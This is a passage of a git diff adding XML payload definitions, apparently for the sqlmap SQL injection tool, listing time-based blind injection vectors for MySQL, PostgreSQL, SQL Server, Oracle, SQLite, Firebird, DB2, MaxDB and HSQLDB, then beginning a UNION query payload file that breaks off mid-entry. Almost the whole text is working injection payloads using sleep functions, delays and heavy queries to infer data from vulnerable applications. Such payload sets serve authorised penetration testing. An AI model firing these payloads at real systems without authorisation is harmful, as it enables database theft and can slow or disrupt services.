+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of OR time-based blind tests -->
+
+    <!-- Time-based tests - After ORDER BY...LIMIT... -->
+    <test>
+        <title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
+        <request>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+    <!-- Time-based tests - After ORDER BY...LIMIT... -->
+
+    <!-- Time-based blind tests - Parameter replace -->
+    <test>
+        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL time-based blind - Parameter replace (bool*int)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
+        <request>
+            <payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL time-based blind - Parameter replace (ELT)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 time-based blind - Parameter replace</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
+    <test>
+        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
+        <request>
+            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
+        <request>
+            <payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+    
+    <!-- Untested -->
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- End of time-based blind tests - Parameter replace -->
+
+
+    <!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
+    <test>
+        <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
+        <request>
+            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>    
+    
+    <test>
+        <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
+</root>
diff --git a/xml/payloads/06_union_query.xml b/xml/payloads/06_union_query.xml
new file mode 100644
index 000000000..a3ec3f4b1
--- /dev/null
+++ b/xml/payloads/06_union_query.xml
@@ -0,0 +1,742 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- UNION query tests -->
+    <test>
+        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
